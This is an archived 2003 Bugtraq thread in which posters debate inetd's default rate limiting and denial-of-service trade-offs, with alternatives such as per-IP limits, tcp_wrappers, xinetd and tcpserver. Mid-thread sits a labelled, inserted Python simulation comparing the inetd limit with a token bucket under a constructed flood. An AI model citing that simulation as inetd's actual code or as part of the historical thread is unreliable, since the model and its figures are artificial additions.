Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
(10657826) /Paul Szabo <psz@maths.usyd.edu.au>/(Rewrapped)
Comment in text 10657423 by 3APA3A <3APA3A@SECURITY.NNOV.RU>
Comment in text 10658590 by Lucas Holt <luke@foolishgames.com>
10658590 2003-09-08 16:51 -0400 /42 lines/ Lucas Holt <luke@foolishgames.com>
Imported: 2003-09-08 23:50 by Brevbäraren
External recipient: Paul Szabo <psz@maths.usyd.edu.au>
External CC recipient: 3APA3A@SECURITY.NNOV.RU
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28875>
Comment on text 10657826 by Paul Szabo <psz@maths.usyd.edu.au>
Subject: Re: 11 years of inetd default insecurity?
------------------------------------------------------------
From: Lucas Holt <luke@foolishgames.com>
To: psz@maths.usyd.edu.au (Paul Szabo)
Cc: 3APA3A@SECURITY.NNOV.RU, bugtraq@securityfocus.com
Message-ID: <2EA9C34C-E23E-11D7-BB51-0030656DD690@foolishgames.com>
>
>
> Your cure is worse than the disease: rate limiting allows a DoS
> against the
> service, no limit allows a DoS against the whole machine.
>
> Cheers,
>
> Paul Szabo - psz@maths.usyd.edu.au
> http://www.maths.usyd.edu.au:8000/u/psz/
> School of Mathematics and Statistics University of Sydney 2006
> Australia
>
Isn't that the point of system administration, to set reasonable
values for such things? A balance between a reasonable load and a
full DOS attack on the service or machine must be achieved.
I don't see how this feature is bad as long as it's used properly.
Besides, many people run multiple services on a host... if you set the
value to unlimited all services are DOS'd. For instance, I have a
system running apache, sendmail, and imapd. imapd is spawned by inetd
and therefore could be DOS'd with a limit. By setting a limit though,
my apache and sendmail servers stay up. I think this is a no brainer.
Lucas Holt
Luke@FoolishGames.com
________________________________________________________
FoolishGames.com (Jewel Fan Site)
JustJournal.com (Free blogging)
"Only two things are infinite, the universe and human stupidity, and
I'm not sure about the former."
- Albert Einstein (1879-1955)
(10658590) /Lucas Holt <luke@foolishgames.com>/(Rewrapped)
10658134 2003-09-09 05:11 +1000 /27 lines/ Paul Szabo <psz@maths.usyd.edu.au>
Imported: 2003-09-08 22:11 by Brevbäraren
External recipient: 3APA3A@SECURITY.NNOV.RU
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28871>
Subject: Re: Re[2]: 11 years of inetd default insecurity?
------------------------------------------------------------
From: psz@maths.usyd.edu.au (Paul Szabo)
To: 3APA3A@SECURITY.NNOV.RU
Cc: bugtraq@securityfocus.com
Message-ID: <200309081911.h88JBCY201696@milan.maths.usyd.edu.au>
3APA3A <3APA3A@SECURITY.NNOV.RU> wrote:
>>> -R 0 -s your_ad_can_be_here
>
>> Your cure is worse than the disease: rate limiting allows a DoS
>> against the service, no limit allows a DoS against the whole
>> machine.
>
> -s limits the number of processes invoked from the same IP. You can additionally
> use -c to prevent a distributed attack. It doesn't allow the box to be DoSed and
> doesn't disable the service for 10 minutes.
Note that my (DEC/Compaq/HP Tru64) inetd does not have -c or -s
options. The only safe way is to use a sensible -R and
tcp_wrappers. Or upgrade to Linux and xinetd...
Cheers,
Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
(10658134) /Paul Szabo <psz@maths.usyd.edu.au>/(Re-wrapped)
Commented on in text 10658630 by 3APA3A <3APA3A@security.nnov.ru>
10658630 2003-09-08 23:56 +0400 /34 lines/ 3APA3A <3APA3A@security.nnov.ru>
Imported: 2003-09-09 00:01 by Brevbäraren
External recipient: Paul Szabo <psz@maths.usyd.edu.au>
External copy recipient: bugtraq@securityfocus.com
External replies to: 3APA3A@security.nnov.ru
Recipient: Bugtraq (import) <28877>
Comment on text 10658134 by Paul Szabo <psz@maths.usyd.edu.au>
Subject: Re[4]: 11 years of inetd default insecurity?
------------------------------------------------------------
From: 3APA3A <3APA3A@security.nnov.ru>
To: psz@maths.usyd.edu.au (Paul Szabo)
Cc: bugtraq@securityfocus.com
Message-ID: <722336921.20030908235627@security.nnov.ru>
Hello Paul,
Monday, September 8, 2003, 11:11:12 PM, you wrote:
>> -s limits the number of processes invoked from the same IP. You can additionally
>> use -c to prevent a distributed attack. It doesn't allow the box to be DoSed and
>> doesn't disable the service for 10 minutes.
PS> Note that my (DEC/Compaq/HP Tru64) inetd does not have -c or -s
PS> options. The only safe way is to use a sensible -R and
PS> tcp_wrappers. Or upgrade to Linux and xinetd...
It proves the code needs to be rewritten. I don't understand why
the limit is on a per-minute, not a per-second, basis. Oh no, I
understand. This is the result of the code having been written more than
10 years ago. But what I completely fail to understand is how
disabling the service for 10 minutes increases security. It's because
I'm green, stupid and brain damaged.
IMHO reasonable behavior is limiting the number of requests accepted
per second without disabling the service. But this code has become a kind
of sacred cow. The only hope is that young monsters like xinetd will get rid of this
dinosaur as a result of evolution.
--
/3APA3A
(10658630) /3APA3A <3APA3A@security.nnov.ru>/(Re-wrapped)
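The per-second limit without shutting the service off, as argued for in the post above, modelled as an added example (not code from inetd or from any poster): a sliding-window model of inetd's -R (256 invocations per minute, then a 10-minute shutdown; 0 means unlimited) next to a token-bucket limiter, both run against a constructed 60-second flood while a legitimate client connects every 5 seconds. The sliding window, the token-bucket rates and the scenario are assumptions.

```python
from collections import deque

MS_PER_MIN, TEN_MIN_MS = 60_000, 600_000

class InetdRateLimiter:
    """Model of inetd -R (assumption: sliding one-minute window). Once `rate`
    invocations fall within a minute the service is disabled for 10 minutes."""
    def __init__(self, rate=256):
        self.rate, self.starts, self.disabled_until = rate, deque(), -1

    def accept(self, now_ms):
        if now_ms < self.disabled_until:
            return False                      # "service terminated": nothing is spawned
        while self.starts and now_ms - self.starts[0] >= MS_PER_MIN:
            self.starts.popleft()             # forget invocations older than one minute
        if self.rate and len(self.starts) >= self.rate:   # rate 0 = unlimited
            self.disabled_until = now_ms + TEN_MIN_MS     # "server failing (looping)"
            return False
        self.starts.append(now_ms)
        return True

class TokenBucketLimiter:
    """Per-second limit: excess connections are refused one at a time, the
    service is never switched off. Integer millitokens avoid float drift."""
    def __init__(self, per_second=10, burst=20):
        self.per_ms, self.cap = per_second, burst * 1000   # 1 token = 1000 millitokens
        self.tokens, self.last = self.cap, 0

    def accept(self, now_ms):
        self.tokens = min(self.cap, self.tokens + (now_ms - self.last) * self.per_ms)
        self.last = now_ms
        if self.tokens >= 1000:
            self.tokens -= 1000
            return True
        return False

def simulate(limiter, flood_ms=60_000, flood_per_s=50, run_ms=720_000, legit_every_ms=5_000):
    """Constructed scenario: an attacker opens flood_per_s connections/s for the
    first flood_ms; a legitimate client connects every legit_every_ms for the whole
    run. Returns the number of accepted connections per party."""
    step = 1000 // flood_per_s
    events = [(t, 'attacker') for t in range(0, flood_ms, step)]
    events += [(t, 'legit') for t in range(0, run_ms, legit_every_ms)]
    accepted = {'attacker': 0, 'legit': 0}
    for now_ms, who in sorted(events):        # on ties the attacker's connection is first
        if limiter.accept(now_ms):
            accepted[who] += 1
    return accepted
```

Running `simulate()` over the three limiters shows the trade-off the thread argues about: the default -R 256 stops spawning after 254 attacker connections but also refuses the legitimate client for the next ten minutes, -R 0 spawns all 3000 attacker connections, and the token bucket sheds most of the flood while the legitimate client is back in service as soon as the flood ends.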
10663710 2003-09-09 19:25 +0200 /24 lines/ <bjornar.bjorgum.larsen@ementor.no>
Imported: 2003-09-09 21:24 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <28904>
Subject: RE: 11 years of inetd default insecurity?
------------------------------------------------------------
From: <bjornar.bjorgum.larsen@ementor.no>
To: <bugtraq@securityfocus.com>
Message-ID: <FD72AF7813F1294C95279EC6D9784A2F46BCF0@100NOOSLMSG004.common.alpharoot.net>
Dan Stromberg wrote:
> So DJB's program basically has a large listen queue, and goes
> into queue-only mode after 40 concurrent connections?
tcpserver -c n ...
where n is the number of simultaneous connections. Defaults to 40.
> If that's the case, then there's still a DOS
> - just fill the listen queue with so much stuff
> that connections aren't serviced for a long time.
IMHO we do want a limit on simultaneous connections and a queue after
the limit's reached: No limit => Attacker may make one service eat
all resources on your system. No queue => Your system will be
intolerant of sudden bursts: When the limit's reached new connections
will be dropped even when there's no real DoS.
If your limit is not based on maximum simultaneous connections, but
on e.g. maximum resource consumption, the queue argument still holds.
:) Bjørnar
(10663710) /<bjornar.bjorgum.larsen@ementor.no>/(Re-wrapped)